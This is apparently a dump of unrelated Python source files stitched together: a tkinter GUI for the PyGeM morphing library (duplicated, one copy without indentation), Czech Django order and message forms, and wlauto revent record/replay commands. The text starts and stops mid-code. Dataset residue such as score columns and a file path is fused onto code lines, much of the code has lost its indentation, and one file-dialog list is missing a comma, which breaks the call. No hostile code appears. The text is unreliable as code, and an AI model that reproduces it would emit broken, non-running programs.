            self.img = tkinter.PhotoImage(master=self.logo_panel,
                                          file='../readme/logo_PyGeM_gui.gif')
        self.logo_panel.create_image(35, 35, image=self.img)

        # Left frame: input geometry preview.
        self.orig_geo_frame = tkinter.Frame(self.root,
                                            height=450,
                                            width=360,
                                            bg='#c1d0f0')
        self.orig_geo_frame.pack(side="left", padx=5, pady=5)
        self.orig_geo_frame.pack_propagate(0)
        tkinter.Label(self.orig_geo_frame,
                      text="INPUT GEOMETRY",
                      bg='#c1d0f0',
                      font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)

        # Right frame: output geometry preview.
        self.mod_geo_frame = tkinter.Frame(self.root,
                                           height=450,
                                           width=360,
                                           bg='#80ff80',
                                           padx=5,
                                           pady=5)
        self.mod_geo_frame.pack(side="right", padx=5, pady=5)
        self.mod_geo_frame.pack_propagate(0)
        tkinter.Label(self.mod_geo_frame,
                      text="OUTPUT GEOMETRY",
                      bg='#80ff80',
                      font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)

        # Center frame: controls.
        code_frame = tkinter.Frame(self.root,
                                   height=490,
                                   width=360,
                                   relief=tkinter.GROOVE,
                                   borderwidth=1)
        code_frame.pack(padx=5, pady=5)
        code_frame.pack_propagate(0)

        # Button 1: pick the geometry file.
        tkinter.Button(code_frame,
                       text="Pick the geometry",
                       command=self._chose_geometry).grid(row=0,
                                                          column=0,
                                                          padx=3,
                                                          pady=3)
        self.label_geo = tkinter.Label(code_frame,
                                       textvariable=self.print_geometry_path,
                                       fg='red')
        self.print_geometry_path.set("No geometry chosen!")
        self.label_geo.grid(row=0, column=1, padx=3, pady=3)

        # Button 2: pick the parameters file.
        tkinter.Button(code_frame,
                       text="Pick the parameters",
                       command=self._chose_parameters).grid(row=1,
                                                            column=0,
                                                            padx=3,
                                                            pady=3)
        self.label_params = tkinter.Label(code_frame,
                                          textvariable=self.print_parameter_path,
                                          fg='red')
        self.print_parameter_path.set("No parameters file chosen!")
        self.label_params.grid(row=1, column=1, padx=3, pady=3)

        # Entry: output file name (extension added automatically).
        tkinter.Label(code_frame,
                      text="Output geometry file").grid(row=2,
                                                        column=0,
                                                        padx=3,
                                                        pady=3)
        tkinter.Entry(code_frame,
                      bd=5,
                      textvariable=self.outfilename).grid(row=2,
                                                          column=1,
                                                          padx=3,
                                                          pady=3)

        # Checkboxes: optional dumps of the FFD lattices.
        tkinter.Checkbutton(code_frame,
                            text="Dump Original FFD lattice",
                            variable=self.check_var_dump_orig,
                            onvalue=1,
                            offvalue=0,
                            height=3,
                            width=20).grid(row=3, column=0)
        tkinter.Entry(code_frame,
                      bd=5,
                      textvariable=self.outfilename_lattice_orig).grid(row=3,
                                                                       column=1)
        tkinter.Checkbutton(code_frame,
                            text="Dump Morphed FFD lattice",
                            variable=self.check_var_dump_morphed,
                            onvalue=1,
                            offvalue=0,
                            height=3,
                            width=20).grid(row=4, column=0)
        tkinter.Entry(code_frame,
                      bd=5,
                      textvariable=self.outfilename_lattice_mod).grid(row=4,
                                                                      column=1)

        # Run button: performs the morphing.
        tkinter.Button(code_frame,
                       text="Run PyGeM",
                       command=self._run_simulation,
                       bg='#065893',
                       fg='#f19625',
                       font='bold').grid(row=5,
                                         column=0,
                                         columnspan=2,
                                         padx=3,
                                         pady=3)

        # Menu bar with the "Help -> About..." entry.
        menubar = tkinter.Menu(self.root)
        helpmenu = tkinter.Menu(menubar, tearoff=0)
        helpmenu.add_command(label="About...", command=self._goto_website)
        menubar.add_cascade(label="Help", menu=helpmenu)
        self.root.config(menu=menubar)

    def start(self):
        """
        This method initializes and starts the GUI.
        """
        self._main()
        self.root.mainloop()
if __name__ == "__main__":
    # Launch the PyGeM graphical interface.
    Gui().start()
import tkinter
from tkinter.filedialog import askopenfilename
except ImportError:
import Tkinter as tkinter
from tkFileDialog import askopenfilename
import os
import webbrowser
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
class Gui(object):
"""
The class for the Graphic Unit Interface.
:cvar string filename_geometry: input geometry to be morphed.
:cvar string filename_parameters: input parameters file for FFD.
:cvar int check_var_dump_orig: dump or not the original FFD lattice.
:cvar int check_var_dump_morphed: dump or not the morphed FFD lattice.
:cvar string outfilename: name of the output file geometry.
The extension of the file is set automatically equal to the on
of input file 'filename_geometry'.
:cvar string outfilename_lattice_orig: name of the dumped file
for the original lattice.
The extension of the file is set automatically equal to '.vtk'.
:cvar string outfilename_lattice_mod: name of the dumped file
for the morphed lattice.
The extension of the file is set automatically equal to '.vtk'.
:cvar tkinter.Tk root: main window object of the GUI.
:cvar string print_geometry_path: geometry path to be printed close to the
'pick geometry' button.
:cvar string print_parameter_path: parameters file path to be printed
close to the 'pick parameters' button.
:cvar tkinter.Label label_geo: label related to 'print_geometry_path'.
:cvar tkinter.Label label_params: label related to 'print_parameters_path'.
:cvar string url: url of the github page of PyGeM.
:cvar tkinter.Canvas logo_panel: canvas for PyGeM logo.
:cvar tkinter.PhotoImage img: PyGeM logo.
:cvar tkinter.Frame orig_geo_frame: frame for plotting of the
original geometry.
:cvar tkinter.Frame mod_geo_frame: frame for plotting of the final geometry.
"""
def __init__(self):
self.root = tkinter.Tk()
self.root.resizable(width=False, height=False)
self.root.minsize(width=1400, height=400)
self.root.maxsize(width=1400, height=400)
self.root.title('PyGeM')
self.filename_geometry = tkinter.StringVar()
self.filename_parameters = tkinter.StringVar()
self.check_var_dump_orig = tkinter.IntVar()
self.check_var_dump_morphed = tkinter.IntVar()
self.outfilename = tkinter.StringVar()
self.outfilename_lattice_orig = tkinter.StringVar()
self.outfilename_lattice_mod = tkinter.StringVar()
self.print_geometry_path = tkinter.StringVar()
self.print_parameter_path = tkinter.StringVar()
self.label_geo = None
self.label_params = None
self.url = 'https://github.com/mathLab/PyGeM'
self.logo_panel = None
self.img = None
self.orig_geo_frame = None
self.mod_geo_frame = None
def _chose_geometry(self):
"""
The private method explores the file system and allows to select the
wanted geometry.
Up to now, you can select only IGES, OpenFOAM, STL, UNV or VTK
geometry file.
"""
self.filename_geometry =\
askopenfilename(filetypes=[("IGES File", ('*.iges', '*.igs')),
("OpenFOAM File", '*'),
('STL File', '*.stl'),
('UNV File', '*.unv'),
('VTK File', '*.vtk'),
('STEP File', ('*.step, *.stp')) ('All', '*')])
self.print_geometry_path.set(self.filename_geometry)
self.label_geo.configure(fg='green')
def _chose_parameters(self):
"""
The private method explores the file system and allows to select the
wanted parameters file.
It visualizes only .prm files.
"""
self.filename_parameters = askopenfilename(
filetypes=[("Params File", "*.prm")])
self.print_parameter_path.set(self.filename_parameters)
self.label_params.configure(fg='green')
    def _run_simulation(self):
        """
        The private method runs the geometrical morphing.

        It parses the chosen geometry with the handler matching its file
        extension, applies the FFD described by the parameters file, writes
        the morphed geometry (plus the optional lattice dumps) and, for the
        plottable formats, renders input/output previews into the two side
        frames.
        """
        import pygem as pg
        params = pg.params.FFDParameters()
        params.read_parameters(filename=self.filename_parameters)
        # Dispatch on the input extension; OpenFOAM files have no extension,
        # hence the '' key.
        file_extension_in = os.path.splitext(self.filename_geometry)[-1]
        ext_handlers = {'.stl': pg.stlhandler.StlHandler(),
                        '.iges': pg.igeshandler.IgesHandler(),
                        '.igs': pg.igeshandler.IgesHandler(),
                        '.unv': pg.unvhandler.UnvHandler(),
                        '': pg.openfhandler.OpenFoamHandler(),
                        '.vtk': pg.vtkhandler.VtkHandler(),
                        '.stp': pg.stephandler.StepHandler(),
                        '.step': pg.stephandler.StepHandler()}
        if file_extension_in in ext_handlers:
            geo_handler = ext_handlers[file_extension_in]
        else:
            raise NotImplementedError("Format not implemented yet.")
        # Parse -> morph -> write back with the same extension.
        mesh_points = geo_handler.parse(self.filename_geometry)
        free_form = pg.freeform.FFD(params, mesh_points)
        free_form.perform()
        new_mesh_points = free_form.modified_mesh_points
        geo_handler.write(new_mesh_points,
                          self.outfilename.get() + file_extension_in)
        # Optional dumps of the FFD control lattice (before/after morphing).
        if self.check_var_dump_orig.get() == 1:
            pg.utils.write_bounding_box(
                params, self.outfilename_lattice_orig.get() + '.vtk', False)
        if self.check_var_dump_morphed.get() == 1:
            pg.utils.write_bounding_box(
                params, self.outfilename_lattice_mod.get() + '.vtk', True)
        # Only these handlers implement plot(); embed the figures in the GUI.
        if file_extension_in in ['.vtk', '.stl', '.iges', '.igs']:
            figure_in = geo_handler.plot()
            figure_in.set_size_inches(4, 3)
            FigureCanvasTkAgg(figure_in, master=self.orig_geo_frame).\
                get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
            figure_out = geo_handler.plot(
                self.outfilename.get() + file_extension_in)
            figure_out.set_size_inches(4, 3)
            FigureCanvasTkAgg(figure_out, master=self.mod_geo_frame).\
                get_tk_widget().grid(row=1, column=0, padx=5, pady=5)
    def _goto_website(self):
        """
        Open the PyGeM main page on GitHub in the default web browser.

        Bound to the "About..." entry of the Help menu built in _main.
        """
        webbrowser.open(self.url)
def _main(self):
"""
The private method inizializes and visualizes the window.
"""
self.logo_panel = tkinter.Canvas(self.root, height=60, width=60)
self.logo_panel.pack(side="bottom", padx=5, pady=5, anchor=tkinter.SE)
try:
self.img = tkinter.PhotoImage(master=self.logo_panel,
file='readme/logo_PyGeM_gui.gif')
except: # TODO : which exception?
self.img = tkinter.PhotoImage(master=self.logo_panel,
file='../readme/logo_PyGeM_gui.gif')
self.logo_panel.create_image(35, 35, image=self.img)
self.orig_geo_frame = tkinter.Frame(self.root,
height=450,
width=360,
bg='#c1d0f0')
self.orig_geo_frame.pack(side="left", padx=5, pady=5)
self.orig_geo_frame.pack_propagate(0)
tkinter.Label(self.orig_geo_frame,
text="INPUT GEOMETRY",
bg='#c1d0f0',
font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)
self.mod_geo_frame = tkinter.Frame(self.root,
height=450,
width=360,
bg='#80ff80',
padx=5,
pady=5)
self.mod_geo_frame.pack(side="right", padx=5, pady=5)
self.mod_geo_frame.pack_propagate(0)
tkinter.Label(self.mod_geo_frame,
text="OUTPUT GEOMETRY",
bg='#80ff80',
font=("Arial", 20)).grid(row=0, column=0, padx=3, pady=3)
code_frame = tkinter.Frame(self.root,
height=490,
width=360,
relief=tkinter.GROOVE,
borderwidth=1)
code_frame.pack(padx=5, pady=5)
code_frame.pack_propagate(0)
# Buttons 1
tkinter.Button(code_frame,
text="Pick the geometry",
command=self._chose_geometry).grid(row=0,
column=0,
padx=3,
pady=3)
self.label_geo = tkinter.Label(code_frame,
textvariable=self.print_geometry_path,
fg='red')
self.print_geometry_path.set("No geometry chosen!")
self.label_geo.grid(row=0, column=1, padx=3, pady=3)
# Button 2
tkinter.Button(code_frame,
text="Pick the parameters",
command=self._chose_parameters).grid(row=1,
column=0,
padx=3,
pady=3)
self.label_params = tkinter.Label(code_frame,
textvariable=self.print_parameter_path,
fg='red')
self.print_parameter_path.set("No parameters file chosen!")
self.label_params.grid(row=1, column=1, padx=3, pady=3)
# Entry
tkinter.Label(code_frame,
text="Output geometry file").grid(row=2,
column=0,
padx=3,
pady=3)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename).grid(row=2,
column=1,
padx=3,
pady=3)
# Checkboxes
tkinter.Checkbutton(code_frame,
text="Dump Original FFD lattice",
variable=self.check_var_dump_orig,
onvalue=1,
offvalue=0,
height=3,
width=20).grid(row=3, column=0)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename_lattice_orig).grid(row=3,
column=1)
tkinter.Checkbutton(code_frame,
text="Dump Morphed FFD lattice",
variable=self.check_var_dump_morphed,
onvalue=1,
offvalue=0,
height=3,
width=20).grid(row=4, column=0)
tkinter.Entry(code_frame,
bd=5,
textvariable=self.outfilename_lattice_mod).grid(row=4,
column=1)
# Run button
tkinter.Button(code_frame,
text="Run PyGeM",
command=self._run_simulation,
bg='#065893',
fg='#f19625',
font='bold').grid(row=5,
column=0,
columnspan=2,
padx=3,
pady=3)
# Menu
menubar = tkinter.Menu(self.root)
helpmenu = tkinter.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About...", command=self._goto_website)
menubar.add_cascade(label="Help", menu=helpmenu)
self.root.config(menu=menubar)
    def start(self):
        """
        This method initializes and starts the GUI.

        It builds the widgets via _main and then enters the tkinter main
        event loop, blocking until the window is closed.
        """
        self._main()
        self.root.mainloop()
# Entry point: build and run the GUI when the module is executed directly.
# NOTE(review): the "| 0.50293 | 0.220248 |" tail on the last line below is
# dataset-dump residue fused onto the source; the statement is app.start().
if __name__ == "__main__":
    app = Gui()
    app.start() | 0.50293 | 0.220248 |
from __future__ import absolute_import
from django.utils import timezone
from crispy_forms.layout import \
HTML, Layout, Field, Fieldset, MultiField, Div
from crispy_forms.bootstrap import PrependedText
from django.contrib.auth import authenticate, get_user_model, login
from django.contrib.auth.models import User
from django.contrib.auth.tokens import \
default_token_generator as token_generator
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import forms, messages
from .models import Orders
from horizon.utils import validators
from horizon_contrib.forms import SelfHandlingForm
from leonardo.utils.emails import send_templated_email as send_mail
from django.conf import settings
class OrderForm(SelfHandlingForm):
    """
    Order form with Czech labels; a valid submission is persisted as an
    Orders row stamped with the current time.
    """

    # NOTE(review): Python 2-only hack executed at class-definition time to
    # force UTF-8 as the default codec (reload() restores the
    # setdefaultencoding attribute that site.py deletes). It raises
    # NameError on Python 3 -- confirm before porting.
    import sys
    reload(sys)
    sys.setdefaultencoding('UTF8')

    # Czech validation messages shared by the field definitions below.
    error_required = 'Toto pole je vyžadováno.'
    invalid_email_message = 'Zadejte správný formát e-mailu.'

    jmeno = forms.CharField(label="Jméno",
                            max_length=255,
                            widget=forms.TextInput(
                                attrs={'placeholder':
                                       'Jméno',
                                       'autofocus': 'autofocus'}),
                            error_messages={'required': error_required})
    prijmeni = forms.CharField(label="Příjmení",
                               max_length=255,
                               widget=forms.TextInput(
                                   attrs={'placeholder':
                                          'Příjmení'}),
                               error_messages={'required': error_required})
    email = forms.EmailField(label="E-mail",
                             widget=forms.EmailInput(
                                 attrs={'placeholder': 'E-mail'}),
                             error_messages={'required': error_required,
                                             'invalid': invalid_email_message})
    telefon = forms.IntegerField(label="Telefon",
                                 widget=forms.NumberInput(
                                     attrs={'placeholder': 'Telefon'}),
                                 error_messages={'required': error_required})
    zprava = forms.CharField(label="Zpráva",
                             widget=forms.Textarea(
                                 attrs={
                                     'placeholder':
                                     'Zašlete nám Vaši objednávku'}),
                             error_messages={
                                 'required': error_required
                             })

    def __init__(self, *args, **kwargs):
        """Build the crispy-forms layout: name/surname side by side."""
        super(OrderForm, self).__init__(*args, **kwargs)
        self.helper.layout = Layout(
            Div('jmeno', style='padding:5px', css_class='col-md-6'),
            Div('prijmeni', style='padding:5px', css_class='col-md-6'),
            PrependedText('email', '@', placeholder="E-mail"),
            Div('telefon', 'zprava', style='padding:5px',
                css_class='col-md-12')
        )

    def handle(self, request, data):
        """Persist the cleaned form data and flash a success message."""
        Orders.objects.create(jmeno=data['jmeno'],
                              prijmeni=data['prijmeni'],
                              email=data['email'],
                              telefon=data['telefon'],
                              zprava=data['zprava'],
                              datum=timezone.now())
        messages.success(request, "Objednávka úspěšně dokončena.")
        return True
class VzkazVavraForm(SelfHandlingForm):
    """
    Contact/message form (dark-styled variant); a valid submission is stored
    as an Orders row stamped with the current time.
    """

    # NOTE(review): Python 2-only default-encoding hack -- see OrderForm.
    import sys
    reload(sys)
    sys.setdefaultencoding('UTF8')

    # Czech validation messages shared by the fields below.
    error_required = 'Toto pole je vyžadováno.'
    invalid_email_message = 'Zadejte správný formát e-mailu.'

    jmeno = forms.CharField(label="Jméno",
                            max_length=255,
                            widget=forms.TextInput(
                                attrs={'placeholder':
                                       'Jméno',
                                       'autofocus': 'autofocus'}),
                            error_messages={'required': error_required})
    prijmeni = forms.CharField(label="Příjmení",
                               max_length=255,
                               widget=forms.TextInput(
                                   attrs={'placeholder':
                                          'Příjmení'}),
                               error_messages={'required': error_required})
    email = forms.EmailField(label="E-mail",
                             widget=forms.EmailInput(
                                 attrs={'placeholder': 'E-mail'}),
                             error_messages={'required': error_required,
                                             'invalid': invalid_email_message})
    telefon = forms.IntegerField(label="Telefon",
                                 widget=forms.NumberInput(
                                     attrs={'placeholder': 'Telefon'}),
                                 error_messages={'required': error_required})
    # Empty label: the placeholder alone describes the textarea.
    zprava = forms.CharField(label="",
                             widget=forms.Textarea(
                                 attrs={
                                     'placeholder':
                                     'Zde napište Vaši zprávu'}),
                             error_messages={
                                 'required': error_required
                             })

    def __init__(self, *args, **kwargs):
        """Build the crispy-forms layout using the dark input styling."""
        super(VzkazVavraForm, self).__init__(*args, **kwargs)
        self.helper.layout = Layout(
            Div('jmeno', style='padding:5px',
                css_class='col-md-6 form-input-dark'),
            Div('prijmeni', style='padding:5px',
                css_class='col-md-6 form-input-dark'),
            Div('email', 'telefon', 'zprava',
                style='padding:5px', css_class='col-md-12 form-input-dark')
        )

    def handle(self, request, data):
        """Persist the cleaned form data and flash a success message."""
        Orders.objects.create(jmeno=data['jmeno'],
                              prijmeni=data['prijmeni'],
                              email=data['email'],
                              telefon=data['telefon'],
                              zprava=data['zprava'],
                              datum=timezone.now())
        messages.success(request, "Zpráva byla úspěšně odeslána")
        return True
class SendMessageForm(SelfHandlingForm):
    """
    Public "message of support" form: a single textarea; the submission is
    stored as an Orders row whose name columns encode today's date.
    """

    # NOTE(review): Python 2-only default-encoding hack -- see OrderForm.
    import sys
    reload(sys)
    sys.setdefaultencoding('UTF8')

    error_required = 'Toto pole je vyžadováno.'

    zprava = forms.CharField(label="Vzkaz",
                             widget=forms.Textarea(
                                 attrs={
                                     'placeholder':
                                     'Podpořte Jitku'}),
                             error_messages={
                                 'required': error_required
                             },
                             help_text="Tento vzkaz se zobrazí na hlavní stránce")

    def __init__(self, *args, **kwargs):
        """Build the single-field crispy-forms layout."""
        super(SendMessageForm, self).__init__(*args, **kwargs)
        self.helper.layout = Layout(
            Div('zprava', style='padding:5px',
                css_class='col-md-12')
        )

    def handle(self, request, data):
        """Store the message; the name columns are (ab)used for the date."""
        # NOTE(review): jmeno receives the arithmetic SUM year + month + day
        # (an int), while prijmeni gets the formatted "YYYY MM.DD" string --
        # the sum looks unintended; confirm against the Orders model.
        order = Orders.objects.create(jmeno=timezone.now().year +
                                      timezone.now().month + timezone.now().day,
                                      prijmeni=str(timezone.now(
                                      ).year) + " " +
                                      str(timezone.now().month) +
                                      "." + str(timezone.now().day),
                                      email=" ",
                                      telefon=0,
                                      zprava=data['zprava'],
                                      datum=timezone.now())
        # create() already saves; this second save() is redundant but harmless.
        order.save()
        messages.success(request, "Vzkaz úspěšne poslán.")
        # NOTE(review): the "| ... |" tail below is dataset-dump residue fused
        # onto the source line; the logical statement is ``return True``.
        return True | leonardo_module_kkadavy/forms.py | from __future__ import absolute_import
from django.utils import timezone
from crispy_forms.layout import \
HTML, Layout, Field, Fieldset, MultiField, Div
from crispy_forms.bootstrap import PrependedText
from django.contrib.auth import authenticate, get_user_model, login
from django.contrib.auth.models import User
from django.contrib.auth.tokens import \
default_token_generator as token_generator
from django.contrib.sites.models import Site
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import forms, messages
from .models import Orders
from horizon.utils import validators
from horizon_contrib.forms import SelfHandlingForm
from leonardo.utils.emails import send_templated_email as send_mail
from django.conf import settings
class OrderForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
invalid_email_message = 'Zadejte správný formát e-mailu.'
jmeno = forms.CharField(label="Jméno",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Jméno',
'autofocus': 'autofocus'}),
error_messages={'required': error_required})
prijmeni = forms.CharField(label="Příjmení",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Příjmení'}),
error_messages={'required': error_required})
email = forms.EmailField(label="E-mail",
widget=forms.EmailInput(
attrs={'placeholder': 'E-mail'}),
error_messages={'required': error_required,
'invalid': invalid_email_message})
telefon = forms.IntegerField(label="Telefon",
widget=forms.NumberInput(
attrs={'placeholder': 'Telefon'}),
error_messages={'required': error_required})
zprava = forms.CharField(label="Zpráva",
widget=forms.Textarea(
attrs={
'placeholder':
'Zašlete nám Vaši objednávku'}),
error_messages={
'required': error_required
})
def __init__(self, *args, **kwargs):
super(OrderForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('jmeno', style='padding:5px', css_class='col-md-6'),
Div('prijmeni', style='padding:5px', css_class='col-md-6'),
PrependedText('email', '@', placeholder="E-mail"),
Div('telefon', 'zprava', style='padding:5px',
css_class='col-md-12')
)
def handle(self, request, data):
Orders.objects.create(jmeno=data['jmeno'],
prijmeni=data['prijmeni'],
email=data['email'],
telefon=data['telefon'],
zprava=data['zprava'],
datum=timezone.now())
messages.success(request, "Objednávka úspěšně dokončena.")
return True
class VzkazVavraForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
invalid_email_message = 'Zadejte správný formát e-mailu.'
jmeno = forms.CharField(label="Jméno",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Jméno',
'autofocus': 'autofocus'}),
error_messages={'required': error_required})
prijmeni = forms.CharField(label="Příjmení",
max_length=255,
widget=forms.TextInput(
attrs={'placeholder':
'Příjmení'}),
error_messages={'required': error_required})
email = forms.EmailField(label="E-mail",
widget=forms.EmailInput(
attrs={'placeholder': 'E-mail'}),
error_messages={'required': error_required,
'invalid': invalid_email_message})
telefon = forms.IntegerField(label="Telefon",
widget=forms.NumberInput(
attrs={'placeholder': 'Telefon'}),
error_messages={'required': error_required})
zprava = forms.CharField(label="",
widget=forms.Textarea(
attrs={
'placeholder':
'Zde napište Vaši zprávu'}),
error_messages={
'required': error_required
})
def __init__(self, *args, **kwargs):
super(VzkazVavraForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('jmeno', style='padding:5px',
css_class='col-md-6 form-input-dark'),
Div('prijmeni', style='padding:5px',
css_class='col-md-6 form-input-dark'),
Div('email', 'telefon', 'zprava',
style='padding:5px', css_class='col-md-12 form-input-dark')
)
def handle(self, request, data):
Orders.objects.create(jmeno=data['jmeno'],
prijmeni=data['prijmeni'],
email=data['email'],
telefon=data['telefon'],
zprava=data['zprava'],
datum=timezone.now())
messages.success(request, "Zpráva byla úspěšně odeslána")
return True
class SendMessageForm(SelfHandlingForm):
import sys
reload(sys)
sys.setdefaultencoding('UTF8')
error_required = 'Toto pole je vyžadováno.'
zprava = forms.CharField(label="Vzkaz",
widget=forms.Textarea(
attrs={
'placeholder':
'Podpořte Jitku'}),
error_messages={
'required': error_required
},
help_text="Tento vzkaz se zobrazí na hlavní stránce")
def __init__(self, *args, **kwargs):
super(SendMessageForm, self).__init__(*args, **kwargs)
self.helper.layout = Layout(
Div('zprava', style='padding:5px',
css_class='col-md-12')
)
def handle(self, request, data):
order = Orders.objects.create(jmeno=timezone.now().year +
timezone.now().month + timezone.now().day,
prijmeni=str(timezone.now(
).year) + " " +
str(timezone.now().month) +
"." + str(timezone.now().day),
email=" ",
telefon=0,
zprava=data['zprava'],
datum=timezone.now())
order.save()
messages.success(request, "Vzkaz úspěšne poslán.")
return True | 0.451568 | 0.083628 |
import os
import sys
import signal
from math import ceil
from wlauto import ExtensionLoader, Command, settings
from wlauto.common.resources import Executable
from wlauto.core.resource import NO_ONE
from wlauto.core.resolver import ResourceResolver
from wlauto.core.configuration import RunConfiguration
from wlauto.core.agenda import Agenda
from wlauto.utils.revent import ReventRecording, GAMEPAD_MODE
class ReventCommand(Command):
    """
    Shared base for the revent record/replay commands: validates the CLI
    arguments, connects to the target device, deploys the ``revent`` binary
    and dispatches to the subclass-specific run().
    """

    # Validate command options
    def validate_args(self, args):
        # --clear wipes an app's cache, so it only makes sense together
        # with --package.
        if args.clear and not args.package:
            print "Package must be specified if you want to clear cache\n"
            self.parser.print_help()
            sys.exit()

    # pylint: disable=W0201
    def execute(self, args):
        """
        Entry point invoked by the WA command dispatcher.

        Loads the user configuration, connects to and initializes the
        configured device, installs the host-side ``revent`` executable on
        it (path kept in self.target_binary) and hands over to run().
        """
        self.validate_args(args)
        self.logger.info("Connecting to device...")
        ext_loader = ExtensionLoader(packages=settings.extension_packages,
                                     paths=settings.extension_paths)

        # Setup config
        self.config = RunConfiguration(ext_loader)
        for filepath in settings.get_config_paths():
            self.config.load_config(filepath)
        self.config.set_agenda(Agenda())
        self.config.finalize()
        context = LightContext(self.config)

        # Setup device
        self.device = ext_loader.get_device(settings.device, **settings.device_config)
        self.device.validate()
        self.device.dynamic_modules = []
        self.device.connect()
        self.device.initialize(context)

        host_binary = context.resolver.get(Executable(NO_ONE, self.device.abi, 'revent'))
        self.target_binary = self.device.install_executable(host_binary)

        self.run(args)

    def run(self, args):
        # Concrete subclasses implement the actual record/replay logic.
        raise NotImplementedError()
class RecordCommand(ReventCommand):
    name = 'record'
    description = '''Performs a revent recording
    This command helps create revent recordings. It will automatically
    deploy revent and even has the option of automatically opening apps.
    Revent allows you to record raw inputs such as screen swipes or button presses.
    This can be useful for recording inputs for workloads such as games that don't
    have XML UI layouts that can be used with UIAutomator. As a drawback from this,
    revent recordings are specific to the device type they were recorded on.
    WA uses two parts to form the names of revent recordings in the format,
    {device_name}.{suffix}.revent
    - device_name can either be specified manually with the ``-d`` argument or
    else the name of the device will be automatically determined. On an Android device it is obtained
    from ``build.prop``, on Linux devices it is obtained from ``/proc/device-tree/model``.
    - suffix is used by WA to determine which part of the app execution the
    recording is for, currently either ``setup``, ``run`` or ``teardown``. This
    should be specified with the ``-s`` argument.
    **gamepad recording**
    revent supports an alternative recording mode, where it will record events
    from a single gamepad device. In this mode, revent will store the
    description of this device as a part of the recording. When replaying such
    a recording, revent will first create a virtual gamepad using the
    description, and will replay the events into it, so a physical controller
    does not need to be connected on replay. Unlike standard revent recordings,
    recordings generated in this mode should be (to an extent) portable across
    different devices.
    note:
    - The device on which a recording is being made in gamepad mode, must have
    exactly one gamepad connected to it.
    - The device on which a gamepad recording is being replayed must have
    /dev/uinput enabled in the kernel (this interface is necessary to create
    virtual gamepad).
    '''

    def initialize(self, context):
        # Register the command-line interface for ``wa record``.
        self.context = context
        self.parser.add_argument('-d', '--device', help='The name of the device')
        self.parser.add_argument('-s', '--suffix', help='The suffix of the revent file, e.g. ``setup``')
        self.parser.add_argument('-o', '--output', help='Directory to save the recording in')
        self.parser.add_argument('-p', '--package', help='Package to launch before recording')
        self.parser.add_argument('-g', '--gamepad', help='Record from a gamepad rather than all devices.',
                                 action="store_true")
        self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
                                 action="store_true")
        self.parser.add_argument('-S', '--capture-screen', help='Record a screen capture after recording',
                                 action="store_true")

    def run(self, args):
        """Interactively drive a recording session on the device."""
        # Recording name: "<device>.<suffix>.revent"; the dot after the
        # suffix is appended here so the suffix stays optional.
        if args.device:
            device_name = args.device
        else:
            device_name = self.device.get_device_model()
        if args.suffix:
            args.suffix += "."
        revent_file = self.device.path.join(self.device.working_directory,
                                            '{}.{}revent'.format(device_name, args.suffix or ""))
        if args.clear:
            self.device.execute("pm clear {}".format(args.package))
        if args.package:
            self.logger.info("Starting {}".format(args.package))
            self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
        self.logger.info("Press Enter when you are ready to record...")
        raw_input("")
        # Launch revent in the background; "-g " selects gamepad mode.
        gamepad_flag = '-g ' if args.gamepad else ''
        command = "{} record {}-s {}".format(self.target_binary, gamepad_flag, revent_file)
        self.device.kick_off(command)
        self.logger.info("Press Enter when you have finished recording...")
        raw_input("")
        if args.capture_screen:
            self.logger.info("Recording screen capture")
            self.device.capture_screen(args.output or os.getcwdu())
        # SIGINT tells revent to flush and close the recording cleanly.
        self.device.killall("revent", signal.SIGINT)
        self.logger.info("Waiting for revent to finish")
        # NOTE(review): busy-wait -- spins on repeated process listings until
        # revent exits; a short sleep in the loop would be kinder.
        while self.device.get_pids_of("revent"):
            pass
        self.logger.info("Pulling files from device")
        self.device.pull_file(revent_file, args.output or os.getcwdu())
class ReplayCommand(ReventCommand):
    name = 'replay'
    description = '''Replay a revent recording
    Revent allows you to record raw inputs such as screen swipes or button presses.
    See ``wa show record`` to see how to make an revent recording.
    '''

    def initialize(self, context):
        # Register the command-line interface for ``wa replay``.
        self.context = context
        self.parser.add_argument('revent', help='The name of the file to replay')
        self.parser.add_argument('-p', '--package', help='Package to launch before recording')
        self.parser.add_argument('-C', '--clear', help='Clear app cache before launching it',
                                 action="store_true")

    # pylint: disable=W0201
    def run(self, args):
        """Push the recording to the device and replay it to completion."""
        self.logger.info("Pushing file to device")
        self.device.push_file(args.revent, self.device.working_directory)
        revent_file = self.device.path.join(self.device.working_directory, os.path.split(args.revent)[1])
        if args.clear:
            self.device.execute("pm clear {}".format(args.package))
        if args.package:
            self.logger.info("Starting {}".format(args.package))
            self.device.execute('monkey -p {} -c android.intent.category.LAUNCHER 1'.format(args.package))
        self.logger.info("Replaying recording")
        command = "{} replay {}".format(self.target_binary, revent_file)
        # Timeout = recorded duration plus 30s of slack.
        recording = ReventRecording(args.revent)
        timeout = ceil(recording.duration) + 30
        recording.close()
        # NOTE(review): recording.mode is read after close(); presumably the
        # header fields stay cached on the object -- confirm. Gamepad replay
        # needs root to create the virtual uinput device.
        self.device.execute(command, timeout=timeout,
                            as_root=(recording.mode == GAMEPAD_MODE))
        self.logger.info("Finished replay")
# Used to satisfy the API
class LightContext(object):
    """Minimal execution-context stand-in: only carries a resource resolver."""
    def __init__(self, config):
        self.resolver = ResourceResolver(config)
        # NOTE(review): the "| ... |" tail below is dataset-dump residue fused
